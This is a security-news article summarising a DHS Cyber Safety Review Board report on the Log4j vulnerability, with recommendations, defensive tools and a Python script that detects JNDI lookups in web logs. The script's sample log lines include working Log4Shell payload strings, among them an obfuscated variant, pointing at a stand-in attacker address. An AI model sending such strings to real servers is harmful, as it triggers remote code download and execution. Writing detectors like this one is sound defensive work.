Log4j represents an "endemic vulnerability" that continues to pose a significant risk to organizations across the United States, according to a new report from the U.S. Department of Homeland Security (DHS) Cyber Safety Review Board (CSRB).
Key takeaways from the report include:
- Many organizations struggled to respond to Log4j attacks and have still not fully patched vulnerable instances.
- Software developers, maintainers, vulnerability response teams and the U.S. government frequently made risk trade-offs regarding software use and integration.
- Log4j attacks highlighted "fundamental adoption gaps" in organizations' vulnerability response practices and cybersecurity hygiene.
- The vulnerability could have been prevented or caught earlier, but the resources to do so were not available to the developers who led the Java Naming and Directory Interface (JNDI) open-source project in 2013. Cybercriminals can abuse JNDI to make a Java application download malicious code and execute it remotely.
The Log4j event "is not over," CSRB pointed out. However, with the right approach, organizations can guard against Log4j attacks and similar threats.
CSRB Offers Log4j Attack Recommendations
In its report, CSRB provided the following recommendations to help organizations protect against Log4j attacks:
- Look for vulnerable software and upgrade it as needed.
- Report any malicious activities that indicate Log4j attacks may be underway.
- Invest in security tools that can be used to identify and respond to Log4j attacks.
- Develop and maintain an accurate IT asset and application inventory.
- Establish a vulnerability response program.
- Create a vulnerability disclosure and handling process.
CSRB continues to explore opportunities to help organizations optimize their cybersecurity. It has proposed creating a baseline requirement for software transparency for federal government vendors. In addition, CSRB may evaluate the efficacy of using a cyber safety reporting system and the feasibility of creating a software security risk assessment center of excellence.
Log4j Security Tools Available to MSSPs
MSSPs can use several security tools to protect themselves and their customers against Log4j attacks, such as:
- Open-Source Search Tool: Cybersecurity experts Beau Woods and Adam Bregenzer in January 2022 released an open-source search tool to help cybersecurity professionals find software products impacted by the Log4j vulnerability.
- Community Shield Dashboard: Network security company Calyptix Security in January 2022 launched the Community Shield dashboard to protect organizations against cybercriminals attempting to identify and exploit the Log4j vulnerability. The dashboard has tracked over 4,000 unique IP addresses attacking organizations through Log4j reconnaissance and exploitation attempts.
- Log4j Scanners: Various Log4j scanners have been released to help organizations detect the Log4j vulnerability.
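As an added illustration of the "report malicious activity" and "identify and respond" recommendations above (example code written for this article, not a tool from CSRB, Calyptix or the authors named here), the script below flags access-log lines carrying a Log4j JNDI lookup string, including ones hidden behind nested lookups that Log4j would expand first. The log lines, IP addresses and hostnames are constructed for the example.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample access-log lines (not real traffic). Lines 2 and 3 carry
# JNDI lookup strings; line 4 carries an unrelated Log4j lookup and is benign here.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:01:07 +0000] "GET /?q=${${lower:J}ndi:rmi://198.51.100.7:1099/b} HTTP/1.1" 404 12 "-" "curl/7.79"',
    '10.0.0.12 - - [10/Dec/2021:10:02:00 +0000] "GET /api HTTP/1.1" 200 88 "-" "${java:version}"',
]

INNERMOST = re.compile(r'\$\{([^${}]*)\}')          # a lookup with no lookup nested inside it
JNDI = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)  # what Log4j would hand to the JNDI lookup

def resolve_lookup(body: str) -> Optional[str]:
    """Statically evaluate the lookups whose result is known from the text alone.
    ${lower:X}/${upper:X} change case; ${key:-default} is assumed to fall back to
    'default' (a heuristic: the real value of key is not visible in the log).
    Other lookups (env, sys, date, ...) are left unresolved."""
    lowered = body.lower()
    if lowered.startswith('lower:'):
        return body[6:].lower()
    if lowered.startswith('upper:'):
        return body[6:].upper()
    if ':-' in body:
        return body.split(':-', 1)[1]
    return None

def normalize(text: str) -> str:
    """Expand nested lookups innermost-first, as Log4j does, until nothing more resolves."""
    while True:
        for m in INNERMOST.finditer(text):
            resolved = resolve_lookup(m.group(1))
            if resolved is not None:
                text = text[:m.start()] + resolved + text[m.end():]
                break  # restart the scan on the shortened string
        else:
            return text  # no resolvable lookup left

def contains_jndi_lookup(line: str) -> bool:
    return JNDI.search(normalize(line)) is not None

def scan_log(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, source_ip, normalized_line) for each line worth reporting."""
    return [(n, line.split(' ', 1)[0], normalize(line))
            for n, line in enumerate(lines, 1) if contains_jndi_lookup(line)]

if __name__ == '__main__':
    for number, ip, payload in scan_log(SAMPLE_LOG_LINES):
        print(f'line {number}: JNDI lookup from {ip}: {payload}')
```

Running it on the sample lines reports lines 2 and 3 with source 10.0.0.9 and the lookup already unwrapped, which is the form worth forwarding to a SIEM or to the vulnerability response program the report recommends.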
MSSPs can teach their customers about Log4j and the risks associated with it. They also can provide their customers with security services to combat Log4j attacks and other cyber threats.